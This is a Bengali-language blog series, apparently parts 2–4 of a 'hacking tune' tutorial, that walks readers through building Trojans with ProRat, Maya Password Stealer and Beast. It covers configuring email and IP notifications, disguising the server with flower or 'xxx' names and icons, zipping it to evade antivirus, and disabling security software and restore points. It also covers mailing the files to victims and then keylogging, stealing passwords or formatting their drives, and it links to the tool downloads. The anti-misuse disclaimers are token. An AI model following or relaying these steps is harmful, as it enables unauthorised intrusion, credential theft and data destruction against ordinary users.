১. এটা হল কাঙ্ক্ষিত সফটওয়্যার ।1 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

২. Create ক্লিক করুন এবং “Create ProRat server (342kbayt)” সিলেক্ট করুন।

1 Copy পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]
 নিচের ছবির মত একটি মেনু আসবে, Notification ক্লিক করুন। এখানে ওনেক গুলো ফিল্ড দেখতে পাচ্ছেন, সবগুলাই অনেক জররি । ।
Notifications

21 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]



(১) “pro connective notification” এ  প্রথমেই আপনার আইপি সেট করুন, কারন এর মাধ্যমেই ProRatt আপনার সাথে ভিকটিম এর যোগাযোগ করাবে। আইপি সেট করতে ছোট লাল arrow যুক্ত বাটনটি ক্লিক করুন (গোল লাল bitto দ্বারা চিহ্নিত), সফটওয়্যারটি অটোমেটিক ভাবে আপনার আইপি সেট করে নেবে। যে আইপি টি আসবে ওইটা মনে রাখবেন, মনে না থাকলে খাতায় লিখে রাখুন। পরে কাজে লাগবে।

(২) “Mail notification” এ আপনার ইমেইল আইডি সেট করুন, এটির মাধ্যমে সফটওয়্যারটি ইমেইল এর মাধ্যমে আপনাকে ভিকটিমের আক্রান্ত হওয়ার এবং তার পিসির বিভিন্য গুরুত্তপুর্ন তথ্য দিবে। প্রথমে আপনার মেইল আইডি টি লখুন তারপর  Test বাটন ক্লিক করুন আর দেখুন notification মেইল চেক করুন  ঠিক মত আপনার ইমেইল আইডিতে আসছে কিনা। টেস্ট মেইলটি  আপনার Spam ফোল্ডার এ জমা হতে পারে। ওখান থাকে মেইলটি সেভ করুন ।  তারপর থেকে ওই মেইল আইডি থেকে সকল notification মেইল আপনার মেইন ইনবক্সে জমা হবে ।

(৩) “ICQ pager notification” ফিল্ডটি পুরন করতে ক্ষুদ্র লাল এরো যুক্ত বাটনটি ক্লিক করুন , সফটওয়্যারটি অটোমেটিক ভাবে আপনার ICQ pager notification সেট করে নেবে।

(৪) “CGI Notification” ঘরটির কিছু change করা লাগবে না । ব্যাস কমপ্লিট হয়ে গেল NOTIFICATION পার্ট।
General Setting

এটি হচ্ছে “General Settings” এখানেও ওনেক গুলো ফিল্ড দেখতে পাচ্ছেন।
22 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

(১) “Server port” যেরকম আছে সেরকম  রাখুন,কোন change করার দরকার নাই।

(২) “Server password” নিজের পছন্দমত দিন, default  হিসাবে 123456 দেওয়া আছে তবে অন্য ProRat ব্যবহারকারীরা যাতে আপনার ভিকটিমকে নিয়ন্ত্রন করতে না পারে সে জন্য নতুন পাসওয়ার্ড দেওয়া প্রয়োজন।

(৩) পছন্দমত “Victim Name” সিলেক্ট করুন। এটাতে আপনার ইচ্চা মত নাম দিতে পারেন। যেমন আমি দিয়েছি ——

(৪) নিচে দেখবেন কতগুলো টিক বক্স আছে। এগুলো হল, আপনার তৈরিকৃত ট্রোজান ভাইরাস  ভিকটিমের পিসিতে কি কি তাণ্ডব চালাবে অর্থাৎ কি কি ক্ষতি করবে তার কমান্ড। আপনার পছন্দ অনুযায়ী অপশন সেট করে দিন। এখন General Setting এর কাজ শেষ।


Bind With File

১. এখন আপনার তৈরিকৃত Trojan টি একটি ফাইলের সাথে bind করতে হবে। এ জন্য মার্ক করা ঘরটিতে টিক দিন তারপর যেকোনো একটা ফাইল অ্যাড করন। Select File এ ক্লিক করে অ্যাড করতে হবে। ছোট একটা ফটো অ্যাড করতে পারেন।

২. বাইন্ডিং ফাইল হিসাবে যে কোন ইমেজ বা হাল্কা ফাইল ইউজ করা ভাল।

32 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

এখন Bind With Fileএর কাজ শেষ।
Server Extensions

১. “Server Extensions” সিলেক্ট করুন এবং আপনার ট্রোজান সারভার এর Extensions সিলেক্ট করে নিন। এক্ষেত্রে .Exe Extensions সিলেক্ট করা ভাল কারন এতে আপনি আইকন সাপোর্ট পাবেন, ফলে ভিকটিমকে ধোঁকা দেওয়া সহজ হবে।

43 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]
Server Icon

১. “Server Icon” থেকে আইকন সিলেক্ট করুন। আইকন সিলেক্টের ক্ষেত্রে একটু কৌশলী হোন যাতে ভিকটিমকে সহজে ধোকা দেওয়া যায়। যেমন আমি flower আইকন সিলেক্ট করেছি।

63 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

server icon আর কাজ শেষ ।

এখন  “Create Server” ক্লিক করুন।  তারপর একটি  ওয়ার্নিং বার্তা আসবে । অখানে Ok করুন্। তাহলে তৈরি হয়ে যাবে আপনার ট্রোজান ভাইরাস।

73 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

ProRat এর ফোল্ডার এ দেখবেন Server.exe নামে একটি ফাইল তৈরি হয়েছে। এটিই আপনার কাংখিত ট্রোজান ভাইরাস। ভুলেও এই সারভারটি আপনার পিসিতে রান করাবেন না। তাহলে আপনার পিসির সর্বনাশ হয়ে যাবে।

*** কৌশল অনুযায়ী আইকন এর সাথে মিল রেখে সারভারটি রিনেম করুন, যেমন আমি ফুল এর সাথে মিল রেখে নাম দিয়েছি “I Love You”। মানে ফাইলটির চেহারা এমন করবেন যাতে এন্টিভাইরাস ছাড়া ভিকটিম যেন কোনমতেই বুঝতে না পারে যে এটি একটি ফাঁদ।

****ফাইলটিকে জিপ করে রাখুন (কমপ্রেস করে রাখুন) । Trojan  ফাইলটাকে জিপ ফাইল করা হল কারন এন্টিভাইরাস প্রোগ্রামগুলো সাধারনত জিপ/ রার (Zip/Rar) ফাইল  সমুহ স্ক্যান করে না।

*****আবার ফাইল টি কে mediafire অথবা অন্য যেকোনো হস্টিং সাইট এ আপলোড করুন।

এবার কিছু ভাল কথা ( যেমন লাভ বিষয়ে কিছু লেখা লিখে)  লিখে জিপ ফাইলটিকে কোন সাইট এ কমেন্ট করার সময় জিপ ফাইল টির ডাউনলোড লিঙ্ক দিয়ে দিন। ভিকটিম পাগল হয়ে ডাউনলোড করে ফেলবে। আর আপনি চাইলে  ইমেইল করে ভিকটিমের কাছে পাঠিয়ে দিন আপনার বানানো ভাইরাস ফাইল টি। আমি আপনাদের কিছু ইমেইল অ্যাড্রেস দিচ্চি। । যদি ভিকটিম ফাইলটি রান করে তবে ট্রোজান সারভারটি আপনার সেটকৃত কমান্ড অনুযায়ী তার পিসিতে তান্ডব লীলা চালাবে এবং তার ইন্টারনেট চালু থাকলে তার পুরো পিসির নিয়ন্ত্রন আপনার হাতে এনে দেবে। ভিকটিম আক্রান্ত হলে আপনার কাছে ইমেইল নোটিফিকেশন আসবে । কি মজা না!!!!

###### victim এর পিসি থেকে আপনার অ্যাকাউন্ট এ মেইল আশার পর করুন  “Connect” ক্লিক করুন। connect এ ক্লিক করার আগে ওই আইপি টি লিখুন (notification:1) .

#######আপনার তৈরিকৃত ভাইরাস এর পাসওয়ার্ড দিয়ে OK করুন। নিচের মত মেসেজ আসবে।

132 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

##########.সফটওয়্যারটির বাম পাশের অপশন গুলো দ্বারা আপনারা ভিকটিমের পিসির সম্পুর্ন নিয়ন্ত্রন নিতে পারবেন এমনকি তার হার্ডড্রাইভ ফরমেট করতে পর্যন্ত পারবেন।
“আবারও বলছি দয়া করে কারো ক্ষতির উদ্দেশ্যে ব্যবহার করবেন না”

এখন ত শুধু আপনি victim আর পিসি তে connect করেছেন। এখন আসুন কিভাবে কাজ করবে। আপনি ২৪ টি অপশন দিয়ে ভিকটিম আর পিসি নিয়ন্ত্রন করতে পারেন। এখন আমি যদি আপনাদের ২৪ টি অপশন শিখাতে যাই তাহলে আমার ২৪ দিন সময় লাগবে। হাহাহা……তাই এখন আমি আপনাদের মাত্র কয়েক টা জিনিস শিখাব।  এই অপশন গুলো খুবই খুবই সহজ। আশা করি আপনারা নিজেরাই পারবেন।
1. windows.

windows এ ক্লিক করেন তারপর নিচের ছবির মত দেখতে পারবেন। ওখান থেকে victim আর পিসি refresh সহ আড়ও অনেক কিছু করতে পারবেন।

110 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]



 2. message

message এ ক্লিক করে নিচের ছবিত মত victim কে message দিতে পারেন…

24 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]





3. chat    চ্যাটএ ক্লিক করে চ্যাটও করতে পারবেন। নিচের ছবি দেখুন ।

33 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

4.KeyLogger

Key logger এ ক্লিক করে victim এর অনেক তথ্য জানতে পারেন।। যারা KeyLogger সম্পর্কে জানেন তারা একটু বেশি জানবেন।।

44 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

5. Give Damage

Give Damage এ ক্লিক করে victim এর হার্ডডিস্ক ফরম্যাট করতে পারবেন।

53 পিসি হ্যাক করে কন্ট্রোল করুন ও তাণ্ডব চালান অন্যের পিসিতে । *3xtreme hacking Tune* [part 2]

অনেক গুলো হল। আর লিখতে পারছিনা।। পরে সময় পেলে পোস্ট আপডেট করা হবে।

হ্যাকিং নিয়ে আমার টিউন চলতে থাকবে। আমাদের সঙ্ঘে থাকুন। তাহলে যারা নতুন তারা অনেক কিছু জানতে পারবেন।। বিশেষ করে এইসব ভাইরাস এর আক্রমন থেকে বাচতে পারবেন। এখন থেকে কেউ এরকম ফাইল আপনাকে পাঠালে ওপেন করবেন না। সাথে সাথে ডিলিট করে দিবেন।
ভাল থাকুন…… উপরে লেখায় ভুল হলে মাফ করবেন।   ও ভাল কথা থিম টা http://www.mediafire.com/?s5f2we5tkps7s72 করেন এখান থেকে  theme ইন্সটল করার পর এই grass টা http://www.mediafire.com/?eseb24e7op4zp1e করে রান করুন।

এখন আর সময় নাই। অনেক কিছু লেখার ছিল কিন্তু লিখতে পারলাম না।
আর অবশ্যই কমেন্ট করে জানাবে।। তানালহে পরবর্তী টিউন করতে লেট হবে। কমেন্ট করলে দ্রুত আবার টিউন করবো।

goooooooooood night.


   
পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part-3]

0
0
1
0

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আগের ২টা টিউন করে অনেক উৎসাহ পাইছি । তাই  আজকে আবার আর একটা মারাত্মক Trojan ভাইরাস দিয়ে কিভাবে অন্যজনের পিসি হ্যাক  করা যায় এবং কিভাবে এই ভাইরাসের আক্রমন থেকে বাচা  যায় এই নিয়ে টিউন করবো। ট্রাজন ভাইরাস নিয়ে আড়োও কয়েকটা টিউন করার পর শিখাব কিভাবে ওয়েবসাইট হ্যাক করে deface করতে হয়। তবে এইটা নিয়ে টিউন করতে অনেক সময় লাগবে। প্রথব হ্যাকিং আর method গুলো জানতে হবে। আর কিছুটা ধারনা থাকতে হবে।  আজকে আর কথা না বারিয়ে টিউন করা শুরু করি। হাতে তেমন সময় নাই।অন্য টিউন গুলো থেকে এই হ্যাকিং method টা অনেক সহজ।

    প্রথম   পর্ব।    “LORD PS”
    দ্বিতীয়  পর্ব।    “ProRat v1.9 “
    তৃতীয়  পর্ব।    “Maya Password Stealer”
    পঞ্চম   পর্ব।    “l337 virus creator(Right Hand Man’s)”
    চতুর্থ   পর্ব।    “Beast”
    ষষ্ঠ    পর্ব।     “FUC*ER PS”



“দয়া করে কারো ক্ষতির উদ্দেশ্যে ব্যবহার করবেন না”

আজকে যে Trojan ভাইরাস মেকার নিয়ে টিউন লিখব তা হল “Maya Password Stealer” । এটি একটি অনেক শক্তিশালি প্রোফেসনাল হ্যাকিং সফটওয়্যার  । তাই না জেনে কোন কিছু করতে যাবেন না। আর কাজ করার সময় খুব সতর্ক থাকবেন।
এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাসের প্রোটেকশন disable বা টোটালি অফ করুন।
http://www.mediafire.com/?sl4g1cm6ilp9v8w ক্লিক করে ডাউনলোড করে নিন সফটওয়্যার টি। অথবা আপনারা গুগলে সার্চ করে নতুন ভার্সন গুলো ডাউনলোড করে নিতে পারে। নতুন ভার্সন গুলো আরও অনেক উন্নত।

ডাইনলোডকৃত ফাইলটি Extract করুন। পেয়ে যাবেন কাংক্ষিত সফটওয়্যার। এই সফটওয়্যারটি নিয়ে একটু সাবধানে কাজ করতে হবে, কারন কিছু না জেনে কাজ করলে আপনার নিজের পিসিরই ক্ষতি হয়ে যেতে পারে।

এটি দিয়েও অন্যের অ্যাকাউন্ট এর পাসওয়ার্ড হ্যাক করা হয় একটি ট্রোজান ভাইরাস  সৃস্টির মাধ্যমে। Maya Password Stealer দিয়ে বানানো ভাইরাস যেকোনো মূল্যে ভিকটিম আর পিসি তে রান করাতে হবে।

১। প্রথমে Editor.exe ফাইলটি চালু করুন।নিচের ছবির মত আসবে ।

115 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]



২। এখন  “Ras Password“,  “Grab IE Urls“,  “ActiveX Startup” ঘর গুলোতে টিক(mark) দিন। এগুলো হল প্রোগ্রাম টি কি কি কাজ করবে।

26 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]



৩। এখন আপনি কিভাবে ভিকটিম এর পাসওয়ার্ড (password) পেতে চান? ওখানে তিন টি অপশন আছে, ” Mail Delivery,  PHP Delivery,  Save Locally” আপনারা জেভাবে ভিকটিম এর তথ্য পেতে চান ওই ঘরে টিক (মার্ক) দিন। আমার মনে হয় Mail Deliveryই বেশি ভাল। তাহলে আপনার ইমেইল-এ সব পেয়ে যাবেন।  তাই Mail Delivery তে টিক দিতে পারেন।

35 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]

৪

।  এখন আপনি ” Recipient Email” এ আপনার ইমেইল অ্যাড্রেস টি লেখেন। অর্থার আপনি ইমেইল এ notification পেতে চান ওই ইমেইল অ্যাড্রেস লিখবেন।

তারপর  “From Email”এ যেরকম আছে সে রকম ই থাক। কোন পরিবর্তন করা দরকার নাই।

46 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]



৫।   এখন Clear Saved Passwods Ech (…) Startups” এ 0 অথবা ১,২,৩ আপনার যা ইচ্চা লিখতে পারেন। তবে ০ দিলে বেশি লাভ হয়। এটা হল কত বার স্টার্ট হলে পাসওয়ার্ড পরিবর্তন হবে।

তারপর “File Name” -এ একটি ভাল নাম লিখুন যাতে ভিকটিক  এই ফাইলটার প্রতি আগ্রহ বেশি হয়। আপনি ইচ্চা করলে xxx দিতে পারেন। যার জন্য চিকটিম খুব সহজেই ক্লিক কর থাকবে।

এবং “StartUp Key” এ লিখুন error । তাহলে ভিকটিম বুজবে পিসির কোন ফাইল error। আর ভিকটিম বুজবে-ই না যে তাঁর পিসিতে কোন সমস্যা হয়েছে।

55 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]



৬। এখন কাজ শেষ। এখন শুধু Createএ ক্লিক করে বানিয়ে ফেলুন ভাইরাস ফাইল অর্থাৎ ট্রোজান সার্ভার। এটিকে আবার সেভ করুন।  Createএ ক্লিক করার পর Ok করুন। এখন দেখুন আপনার extract করা ফোল্ডার এ একটি নতুন ফাইল অ্যাড হয়েছে।। অর্থাৎ যে ফোল্ডার থেকে আপনি Editor.exe রান করেছেন ওই ফোল্ডার এ একটি নতুন ফাইল অ্যাড কয়েছে। এটি-ই হল আপনার বানানো কাংক্ষিত ভাইরাস ফাইল।

66 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]


।

75 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]



৮।  এখন ফাইল টিকে জিপ করে মেইল করে পাঠিয়ে দিন ভিকটিম এর কাছে। আপনাদের আমি  ৫০০ million ইমেইল অ্যাড্রেস দিলাম। এখন ইচ্চা মত মেইল করুন। [ আপনার বানানো ফাইল টি-তে ক্লিক করবেন না।]

84 পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড । *3xtreme hacking Tune* [part 3]

ভিকটিম অ্যাটাক হওয়ার কিছু দিনের মধ্যে আপনার ইমেইল-এ মেইল আসবে। আর ওখানে পেয়ে যাবেন ভিকটিম আর সব তথ্য।

এইটা হল Maya Password Stealer নিয়ে মটামটি একটা টিউন ।

ভাল থাকবেন। টিউন ভাল লাগলে কমেন্ট করবেন। অনেক কষ্ট করে লিখেছি।




   
(প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part-4]

0
0
1
0
*****বিসমিল্লাহির রাহমানির রাহিম*****

আসসালামু আলাইকুম, কেমন আছেন সবাই ? আশা করি মহান আল্লাহ তায়ালার অশেষ রহমতে সবাই ভাল আছেন । আমার আগের  টিউন করে অনেক উৎসাহ পাইছি ।  পঞ্চম পর্ব ইতিমধ্যে প্রকাশিত হয়ে গেছে । আর এটা হল চতুর্থ পর্ব ।  এখন চতুর্থ পর্বের টিউন করতে বসলাম । এই পর্বে  আবার আর একটা মারাত্মক Trojan ভাইরাস দিয়ে কিভাবে অন্যজনের পিসি হ্যাক  করা যায় এবং কিভাবে এই ভাইরাসের আক্রমন থেকে বাচা  যায় এই নিয়ে টিউন করবো। Trojan ভাইরাস নিয়ে টিউন শেষ টিউনের কথা ছিল। ভাবতেছি এই ধারাবাহিক টিউন শুধু ট্রাজোন নিয়েই করব। সম্ভাবত Trojan নিয়ে ১০ পর্বের টিউন করা হতে পারে। Trojan নিয়ে শেষ পর্বটা হবে কিভাবে খুব সহজে ভিকটিম কে ধোঁকা দিয়ে তার পিসি-তে ভাইরাস রান করা জায় এবং কিভাবে এই ভাইরাসের হাত থেকে সম্পূর্ণ ভাবে রক্ষা পাওয়া যায়। বেশি কথা না বলে কাজ শুরু করি। কথা কম কাজ বেশি।

    প্রথম   পর্ব।    “LORD PS”
    দ্বিতীয় পর্ব।    “ProRat v1.9 “
    তৃতীয়  পর্ব।   “Maya Password Stealer”
    পঞ্চম   পর্ব।    “l337 virus creator(Right Hand Man’s)”
    চতুর্থ   পর্ব।    “Beast”


আজকে যে Trojan নিয়ে লিখব তার নাম হল “beast”
এটি নিয়ে কাজ করার আগে সবার প্রথমে আপনার পিসির এন্টিভাইরাস diasble করুন/ টোটালি অফ করুন। এন্টিভাইরাস টোটালি অফ করার কথা বলা হয়েছে এই কারনে, কারন এন্টিভাইরাস এটিকে ভাইরাস  সফটওয়্যার হিসাবে ধরবে  এবং আপনাকে কাজ করতে দিবেনা।

প্রথম সফটওয়্যার টি ডাউনলোড করে নিন http://www.mediafire.com/?k7jtub0lsur7l5u

TJ Mir www.freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

সফটওয়্যার টি ওপেন করার পর নিচের ছবির মত আসবে। এইটা হল কাঙ্ক্ষিত সফটওয়্যার। যেটা দিয়ে ভাইরাস Trojan virus বানানো হবে।

***বিঃদ্রঃ-দয়াকরে এই ট্রাজোন-এর কেউ অপব্যাবহার করবেন না। আর কেউ ক্ষতিগ্রশ্ত হলে আমি(মীর) অথবা tunerpage দায়ী থাকবেনা।

এখন চলুন শুরু করা যাক কিভাবে Trojan বানাবেন। “Build Server”-এ ক্লিক করুন। আর statistics টা ক্লোজ করে দেন।

1freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]
Server Settings
“Basic” 1

2freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

3freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

basicএ ক্লিক করে, Name-এ আপনার ইচ্ছা মত যেকোনো নাম দিতে পারেন। এবং ভাল মানের একটি  পাসওয়ার্ড দিন। এ ২টা জিনিস মনে রাখতে হবে। পরে কাজে লাগবে। এখন basic এর কাজ শেষ।
“Notifications”2

4freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

“SIN”-এ ক্লিক করুন। তারপর Get IPতে ক্লিক করন। এবং Connection Time-out-এ ২০, ৩০, ৫০, ২০০ ইচ্ছা মত সেকেন্ড দিতে পারেন। এইটা হল কত সেকেন্ড পর connection বিচ্ছিন্ন হবে।

5freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

“E-Mail” আপনার মেইল address লিখুন। আপনি যে মেইল-এ notification পেতে চান ওই mail address লিখুন।

ICQ & CGI সম্পর্কে যদি না জানেন তাহলে ওগুলো পরিবরতন করার প্রয়োজন নাই।
“StartUp”3

6freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

সব গুলো ঘরে টিক দিন। [যদি ডিফল্ট ভাবে টিক না দেওয়া থাকে ]
“AV-FW Kill”4

7freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

এখন “Kill AV -FW On Start” & “Disable XP FireWall” ঘরে টিক দিন । এই ধাপের কাজ শেষ ।


“Misc.”5

8freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

এখন প্রথম ৪ টা ঘরে টিক দিন।[উপরের ছবি দেখুন]

এগুলো হল (১)ভিকটিম-এর পিসি-টে melt server install, (২)KeyLogger সেটআপ করা , (৩) Restore point রিমুভ করে দেওয়া। যাতে ভিকটিম তার পিসি restore করতে পারবে না। (৪)একটু  পর পর ফেক ইরর বার্তা শোও করা। এখন আপনি ইচ্চা করলে বাকি গুলোও মার্ক করতে পারেন।
“Exe Icon”6

9freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]এখন যেকোনো একটা আইকন সিলেক্ট করেন। এক্ষেত্রে একটু চালাকি করতে হয়। যেমন আপনি একটি ভাল আইকন দিতে পারেন। যাতে ভিকটিক খুব আগ্রহের সাথে ফাইলটি-তে ক্লিক করে। অথবা আপনি আপনার পিসি থেকেও সুন্দর যেকোনো আইকন দিতে পারেন।  এখন সব কাজ শেষ এখন শুধু  ফাইলটা বানানোর পালা।

“Save Server”এ ক্লিক করলে ভাইরাস ফাইল তৈরী হবে।

10freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

এখন Beast software টি যে ফোল্ডার(location) থেকে রান করেছেন ওইখানে দেখুন ফাইলটি সেভ হয়েছে।

11freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]এখন server নামের ফাইল টা rename করেন । এবং এমন একটা নাম দেন জেন ভিকটিম সহজে ক্লিক করে।

12freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]এখন ফাইলটা  কে compressed করেন এবং মেইল করে পাঠিয়ে দিন আপনার শত্রুকে। আমার আগের টিউন গুলো দেখেন, তাহলে আপনাদের কাছে ব্যাপারটা আড়োও সহজ লাগবে। আমি আপনাদের কিছু ইমেইল অ্যাড্রেস দিমাল এখানে।

এখন ভিকটিম যদি আপনার বানান ফাইল-এ ক্লিক করে তাহলে আপনার মেইল অ্যাকাউন্ট-এ message আসবে, যে কেউ আপনার ফাইল-এ ক্লিক করেছে।
এখন আসুন কিভাবে আক্রমন চালাবেন??

এখন host-এ IP address টি লিখুন। এবং আপনার পাসওয়ার্ড টি লিখে Go BEAST!-এ ক্লিক করে connect করুন। (“Notifications”2-এ যে ip ছিল ওইটা)

13freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

connect হয়ার পর সফটওয়্যার-এর দান পাশের অপশন গুলো দ্বারা ভিকটিম-এর পিসি নিয়ন্ত্র করতে পারবেন।

অনেক গুলো অপশন থেকে আমি মাত্র কয়েকটা নিয়ে লিখব আর বাকি গুল আশা করি আপনারা নিজেরাই বুজতে পারবেন। অথবা ৫ম পর্ব টিনের নিচে দেখুন।


“Manager”

14freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]এখানে অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম আর webcam,Screen, Apps, File ect দেখতে পারবেন।


“Windows”

15freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]এখানেও অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম-এর সব কিছু হাইড, crash,shut down, restart, log off করতে পারবেন।


“lamer Stuff”

অনেকে আছে জারা লেমান মানে জানেন না। লেমার মানে হল ক্ষোরা বা পঙ্গু লোক।

17freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]

এখানেও অনেক গুলো অপশন আছে।
এখান থেকে আপনি ভিকটিম-এর মাউস হাইড, সিডি রম লক, ওয়ালপেপার পরিবর্তন এবং চ্যাট করতে পারবেন।
“Misc”

নিচের ছবি টা দেখেন তাহলে সব বুজতে পারবেন ।

18freecall24.blogspot.com (প্রোফেসনাল কিছু হ্যাকিং সফটওয়্যার নিয়ে টিউন)পিসি হ্যাক করে চুরি করুন সব ধরনের পাসওয়ার্ড এবং কন্ট্রোল করুন ভিকটিমের পিসি। *3xtreme hacking Tune* [part 4]



